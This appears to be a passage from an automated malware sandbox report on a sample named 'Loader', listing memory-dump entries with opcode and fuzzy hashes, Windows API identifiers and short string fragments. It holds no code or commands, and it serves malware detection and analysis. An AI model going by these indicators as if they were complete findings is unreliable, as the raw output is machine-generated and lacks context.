                                                                                                  • Opcode ID: 84298f2c1df00ac477d8c9eb7f651bf770509cc0667fa7c23a1cbe41850e76cc
                                                                                                  • Instruction ID: c65bc0e0fd9ab2b407f4ec274a243cae03b52599eb44c3ec4b920f3608bc9bdb
                                                                                                  • Opcode Fuzzy Hash: 84298f2c1df00ac477d8c9eb7f651bf770509cc0667fa7c23a1cbe41850e76cc
                                                                                                  • Instruction Fuzzy Hash: 08912770694B804FE335CF768880763BBE3AB96314F18896DD0D28BB95DB79E446CB14
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "
                                                                                                  • API String ID: 0-123907689
                                                                                                  • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                  • Instruction ID: 981523987b1e43f0f2fbc980dbd505f4044b7fe8cc5f065e6a15477f38c1429d
                                                                                                  • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                  • Instruction Fuzzy Hash: 4071C632B083258BD714CE28E49032FB7E2EBC5750FA9856EE89497395D338DD4587CA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: v4vE
                                                                                                  • API String ID: 0-866190975
                                                                                                  • Opcode ID: 7b64acfa24e2befdd8ac35dee43b38dc2d497a1a5a96ae3d147eba01d7514725
                                                                                                  • Instruction ID: 34cdfc8a34f78da73259cccf7ab61d51709751dea84dcafbc9ea7b9c9e951e0c
                                                                                                  • Opcode Fuzzy Hash: 7b64acfa24e2befdd8ac35dee43b38dc2d497a1a5a96ae3d147eba01d7514725
                                                                                                  • Instruction Fuzzy Hash: D631F4B6A183005BF708DF76AC8255BBAF3EBD5304F19C43DD185D7215EA38C1068B4A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: /kB
                                                                                                  • API String ID: 0-3532343839
                                                                                                  • Opcode ID: b4b5b7e280f642f85b3dfe5987f8b3969132ef151dffa41fcba20c5fda879f96
                                                                                                  • Instruction ID: 30b78e98d0376e77b4dedd947e5e84c4a76dc6197d8d4778f9e0425fae07882d
                                                                                                  • Opcode Fuzzy Hash: b4b5b7e280f642f85b3dfe5987f8b3969132ef151dffa41fcba20c5fda879f96
                                                                                                  • Instruction Fuzzy Hash: EA1159B4E093649FC320AB25A8D017B76A5DF97314F85852FF9C367361EA3C9C02C65A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cfa9a842e54d6f6908c7b800668eb5eb2d5e9b27e34123646e38c57c34ffb93e
                                                                                                  • Instruction ID: 53bedda06ccc27c303568f9e7e6bd49d427b81707e73c2342d6127383662a74f
                                                                                                  • Opcode Fuzzy Hash: cfa9a842e54d6f6908c7b800668eb5eb2d5e9b27e34123646e38c57c34ffb93e
                                                                                                  • Instruction Fuzzy Hash: 4F12B472A087118BC725DF18D8806ABB3E1BFC4315F19893ED9C6A7385D738B8558B87
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ba2a651c7b4397c0272f4726fbccc838470ac406de1116525d09835cc8aaf273
                                                                                                  • Instruction ID: 06ba914754fda528d7acfc96047ccc351decbac5893a7f6043ce80427adf6e18
                                                                                                  • Opcode Fuzzy Hash: ba2a651c7b4397c0272f4726fbccc838470ac406de1116525d09835cc8aaf273
                                                                                                  • Instruction Fuzzy Hash: 02C123B5A183118BD728DF28CC526ABB7F1EFD5314F08862DE8958B384E73C9944C795
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fb2c410d40d8a7215a23457b42f4989fe7a875ffa95cad037c50274c93334019
                                                                                                  • Instruction ID: 6ff10e554b56e7d98c0354463b113c8fe134109c80e7cf3690ca443259b71b45
                                                                                                  • Opcode Fuzzy Hash: fb2c410d40d8a7215a23457b42f4989fe7a875ffa95cad037c50274c93334019
                                                                                                  • Instruction Fuzzy Hash: 91E1397AA68226CBCB189F24D85116B73F2FF4A751F0BC97DD881472A0E7398960C746
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8469296e2ad6377bca0d66c7fdbce60c96d239fa905cce4d846bf08553cb04b8
                                                                                                  • Instruction ID: 5dc1153c2cae88f14e706d6766014c5310a85aff0076e014daa1ca1314a98a54
                                                                                                  • Opcode Fuzzy Hash: 8469296e2ad6377bca0d66c7fdbce60c96d239fa905cce4d846bf08553cb04b8
                                                                                                  • Instruction Fuzzy Hash: 5DF1BD756087418FD724CF29C88076BBBE2EFD9304F08882DE5D597391E639E944CB96
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0e71ddd8efcb11a8d109418157ab47fde1022d2a01cbd6712a0ad8640d730c20
                                                                                                  • Instruction ID: a954b38a6bb1ce87cf69874cc4df31a0facd51f51a0102f5d1bcd2fc66b16d63
                                                                                                  • Opcode Fuzzy Hash: 0e71ddd8efcb11a8d109418157ab47fde1022d2a01cbd6712a0ad8640d730c20
                                                                                                  • Instruction Fuzzy Hash: CFA1F476B096114FD71CCF2AD81132FB6D3ABD4310F5A853EE88AC7395DE74E8128685
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 1d4ee9170cb315f71c8184b5a82f458173e5dc386eddf8c79e1ec2de4589c0f9
                                                                                                  • Instruction ID: 48af3df080d7374f24d22ba405b18466128ca7b67be3218363250a1880df35ed
                                                                                                  • Opcode Fuzzy Hash: 1d4ee9170cb315f71c8184b5a82f458173e5dc386eddf8c79e1ec2de4589c0f9
                                                                                                  • Instruction Fuzzy Hash: 8D91DF756083019BE718DF18C490A2BB3E2FF89750F15846EEA85DB361EB34DC41DB8A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2081274b20256b51a48b52e86fac1d0e917b6bc8052939e7a96106f21d596131
                                                                                                  • Instruction ID: 396e9f4d8292420b39720d4ebe7e3b2ba50298b7ad3af056df74e370846adae9
                                                                                                  • Opcode Fuzzy Hash: 2081274b20256b51a48b52e86fac1d0e917b6bc8052939e7a96106f21d596131
                                                                                                  • Instruction Fuzzy Hash: 4F71353560C2A59FC7048F39D8512AABBE3EBCA314F49896DE8D887350D739DD11CB89
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e2ef3ed592ffea8117d6535c71c633ebd8baee3f6d97b41eb70e06c6ff45de06
                                                                                                  • Instruction ID: 7de542bc9115ef73e19b3091658d28cf0780ac80647d3c93e3c636ac7a511b7b
                                                                                                  • Opcode Fuzzy Hash: e2ef3ed592ffea8117d6535c71c633ebd8baee3f6d97b41eb70e06c6ff45de06
                                                                                                  • Instruction Fuzzy Hash: 99614A355083914FD7258F29C84096B7BE0ABA6314F4882BEE8E84B392D635DC4AC796
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6d1fab72e9f5b1cdff51703c3b7269aa68bcba2dda9f3549e373aaeca11e4806
                                                                                                  • Instruction ID: 66fd862550092496dbaeb2d3bb1543f7b4ae7d39c68e2cc44db9a05b1b136551
                                                                                                  • Opcode Fuzzy Hash: 6d1fab72e9f5b1cdff51703c3b7269aa68bcba2dda9f3549e373aaeca11e4806
                                                                                                  • Instruction Fuzzy Hash: 8C3123B5A04300AFE7109E119CC1B3BB7B5EB89758F10182EF9C5A3201D339EC26879B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 83a46eb97a1ede892c521cd0a1cf27060ef79bfacc0411b261445066a2a95deb
                                                                                                  • Instruction ID: 37f3efdb486df1b50b7503efc8676e0e0480c9f1302ca175b3bd99bebac416ea
                                                                                                  • Opcode Fuzzy Hash: 83a46eb97a1ede892c521cd0a1cf27060ef79bfacc0411b261445066a2a95deb
                                                                                                  • Instruction Fuzzy Hash: DF4190216493494BEB14CD2889815E77B61DBA2350F08C63EECC55B3C1EA3CDA0AD3A9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b8bd4d7e9bd20bf13d05e542f28e56da8f4d605b247b1b6829d47043411abe16
                                                                                                  • Instruction ID: 65860a534bcdc61a69b891c8f4b112b5ccb7c4aa6a6d252a23f247d29c97b397
                                                                                                  • Opcode Fuzzy Hash: b8bd4d7e9bd20bf13d05e542f28e56da8f4d605b247b1b6829d47043411abe16
                                                                                                  • Instruction Fuzzy Hash: F8410436F245554BDB0CCF6888A157FBAB2AB8E310F19E13EC556E7354CB3899058788
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 7429881085838c9e2ea473406c0e777441f7560d71a7cb9971c1e3e1e517dda0
                                                                                                  • Instruction ID: 8192ad4da6690d975133d58e89ccec5cc32f62d7e28f0f863b58bcb031853df0
                                                                                                  • Opcode Fuzzy Hash: 7429881085838c9e2ea473406c0e777441f7560d71a7cb9971c1e3e1e517dda0
                                                                                                  • Instruction Fuzzy Hash: 64313938B556018FC725CB68CCC0B3673A3EBD6315B589639E092673D6DB38E8068788
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8820827ab3717a503f23ee1f329a572c2ac425d8331617b1f9b573c8837ef006
                                                                                                  • Instruction ID: 6483a22a6f500d058f9f4f03b7d1e0b0debdf2b506a58ba5144e8a59cc6fe5a8
                                                                                                  • Opcode Fuzzy Hash: 8820827ab3717a503f23ee1f329a572c2ac425d8331617b1f9b573c8837ef006
                                                                                                  • Instruction Fuzzy Hash: DF31C432E00125CFCB14CF64C8516AFB7B2FF46310F19959AD842AB3A1DB385D01CB94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 311bccfb7c94d63f981d42372d52fcc226d8c5098601f3624a1e21d790acd581
                                                                                                  • Instruction ID: daeb1bb460313cd135989d5d7c02351c17a175b5b9fd5c5575e707a8a0bfda13
                                                                                                  • Opcode Fuzzy Hash: 311bccfb7c94d63f981d42372d52fcc226d8c5098601f3624a1e21d790acd581
                                                                                                  • Instruction Fuzzy Hash: 3C1178217082110AC3249BA9C8C1177F399DBDE724F19967BD9C08F292E2B8CC42C3D5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                  • Instruction ID: 91ac4c5b143b02c7d32e682e2a6aab4e0f1bc94368da354689b67666a2c00c8c
                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                  • Instruction Fuzzy Hash: 6311EC336451D50EC3168D3C84005A67FA30B97234F1AD39EF8B49B2D3D7278D8A8359
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2ee26b68ca80d359eea836c05570f0252371bc8a0c72456eea12c8fb01481f6b
                                                                                                  • Instruction ID: 9eb9525df2382ca65ffc71ea0fe4effccc3bbe68bdeaf4085e84a9653100f2a1
                                                                                                  • Opcode Fuzzy Hash: 2ee26b68ca80d359eea836c05570f0252371bc8a0c72456eea12c8fb01481f6b
                                                                                                  • Instruction Fuzzy Hash: A8019EF5B0031247D6209E11A4C4B2BB2A9AF90748F5D443EEC8457342DB7DFC2482AF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d5d295e9ed382b796e59e78ecd7c3973d9fbade591b377e9c3dd8d664adeac99
                                                                                                  • Instruction ID: fe22f187d6262aa03d792ec1030457158b6d731bbaaa7045d526425db3de230e
                                                                                                  • Opcode Fuzzy Hash: d5d295e9ed382b796e59e78ecd7c3973d9fbade591b377e9c3dd8d664adeac99
                                                                                                  • Instruction Fuzzy Hash: 1D01F46B7A831A0BD700DDBDECD56AAB7A696D5108B1E4139EA80D7781E0B8F8058294
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4230b21a2fd02e58cc7b406f354e8a131570180303f77ccb7a9505112db3ad99
                                                                                                  • Instruction ID: 18454f57bc8bd7713fef9fb37d3191b327954915f6893786146af46e59a98f16
                                                                                                  • Opcode Fuzzy Hash: 4230b21a2fd02e58cc7b406f354e8a131570180303f77ccb7a9505112db3ad99
                                                                                                  • Instruction Fuzzy Hash: AA01B53560E710DFC7188B24948093FB3B2FB9A324FA5556CD59123261D330ED028BCE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 75cdd2821561e72d22e9e4a155e993369658370f557c2a38552048b2028693a2
                                                                                                  • Instruction ID: 6fca0e276dc41d176f9258a46a62d3d95cdd6612b9affbec5bcc6b9929d5356f
                                                                                                  • Opcode Fuzzy Hash: 75cdd2821561e72d22e9e4a155e993369658370f557c2a38552048b2028693a2
                                                                                                  • Instruction Fuzzy Hash: 3001DF30A096209BC7088B14A48053FF3B2EF8B720FD5552DE68667251C335ED028B8E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bfa1d9da91f22f173d497c8b9dff6cb2ad0c54e4f2a9c7da531a3c1cc58556e0
                                                                                                  • Instruction ID: 79179b24096eac5e6ac07bd72d819e76adb0a4e00d37c96423816886d630571d
                                                                                                  • Opcode Fuzzy Hash: bfa1d9da91f22f173d497c8b9dff6cb2ad0c54e4f2a9c7da531a3c1cc58556e0
                                                                                                  • Instruction Fuzzy Hash: E7012B3AA519904BC718CF39DC91AE573A1F797305F19A6BCC406E7274EE3499058B48
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a5f67c24f99cd3bc66bd5b873502f9be22687b740bcac6bb5ea83f9132e44f2e
                                                                                                  • Instruction ID: 006929160d69d297b0fade613808cb138237ee9c33cbc0bff183a40fe4272359
                                                                                                  • Opcode Fuzzy Hash: a5f67c24f99cd3bc66bd5b873502f9be22687b740bcac6bb5ea83f9132e44f2e
                                                                                                  • Instruction Fuzzy Hash: 48F024796093805BD348CF34DCE1A6BBBA6E792608F05653CE58293290CA21DC598A4D
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Variant$ClearInit
                                                                                                  • String ID: $"$%$-$3$4$`$b$d$f$j$l$m$n
                                                                                                  • API String ID: 2610073882-388534048
                                                                                                  • Opcode ID: 0d47e0fe30014c20ce2d32c7426541ef57348e46fc9c568ff5466d38f1117a37
                                                                                                  • Instruction ID: 0ed16d0090aa2853db3fa94cf8c83c94d7f5a066e2027e59c45352e3d5823b27
                                                                                                  • Opcode Fuzzy Hash: 0d47e0fe30014c20ce2d32c7426541ef57348e46fc9c568ff5466d38f1117a37
                                                                                                  • Instruction Fuzzy Hash: 5C415C612087C1CED725CF38C889346BFA2AB62314F08C69DD8E54F39BD279D516C762
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Variant$ClearInit
                                                                                                  • String ID: $"$%$-$3$4$`$b$d$f$j$l$m$n
                                                                                                  • API String ID: 2610073882-388534048
                                                                                                  • Opcode ID: ae5400dcd5d302ef961202c0a16dd426301db3ee827d1cb557e1cc8c01814538
                                                                                                  • Instruction ID: cf5d184b347ae60a31a8e7b64644b3d0961cef50304e460fca956dadef895e24
                                                                                                  • Opcode Fuzzy Hash: ae5400dcd5d302ef961202c0a16dd426301db3ee827d1cb557e1cc8c01814538
                                                                                                  • Instruction Fuzzy Hash: 2F413C612087C08ED726CF3CC885346BFE1AB66314F08869DD8E58F39BD275D516C766
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID: G$glhm$kdge
                                                                                                  • API String ID: 3664257935-3790318392
                                                                                                  • Opcode ID: efda84222cddbdac5fe667d835128501f3c90b1fd491eb25eb067e342f112da9
                                                                                                  • Instruction ID: bfd15d46e1ac39dd06e1a04889429419f0e65eafd70abaf615cf56b171db5900
                                                                                                  • Opcode Fuzzy Hash: efda84222cddbdac5fe667d835128501f3c90b1fd491eb25eb067e342f112da9
                                                                                                  • Instruction Fuzzy Hash: C451267060C3919FE311CB25D850B6BBFD0EFA6300F14486DF5C5AB392D2B98805CB56
                                                                                                  APIs
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004248C1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                  • String ID: ha$ha$q
                                                                                                  • API String ID: 237503144-2525095540
                                                                                                  • Opcode ID: 2afdf2c7a496911d1016a4b7ad03343ecd8edc0553639cf8e445061b07e4d96e
                                                                                                  • Instruction ID: c658e200b3172b2c4a4d6f089079a709458a382cdb7082564cb6dc42ecfb3a23
                                                                                                  • Opcode Fuzzy Hash: 2afdf2c7a496911d1016a4b7ad03343ecd8edc0553639cf8e445061b07e4d96e
                                                                                                  • Instruction Fuzzy Hash: B731D575A00211CFDB10CF98D881BAE7BB1FF49714F158079E914AF396DB75D8028B95
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MetricsSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 4116985748-3916222277
                                                                                                  • Opcode ID: 9263576a989dd9e8dd5ba1139270ca0a2cd30e8eaf9ab1227e7a8ea63402d5a7
                                                                                                  • Instruction ID: e93982ecca13eb1c7eb5bd9c416ca4066cf6d94eca1d44aa69bf2b87bfcca62b
                                                                                                  • Opcode Fuzzy Hash: 9263576a989dd9e8dd5ba1139270ca0a2cd30e8eaf9ab1227e7a8ea63402d5a7
                                                                                                  • Instruction Fuzzy Hash: 3931A3B49143548FDB00EFA8E98565DBBF0BB89704F11852EE498DB360D774A948CF86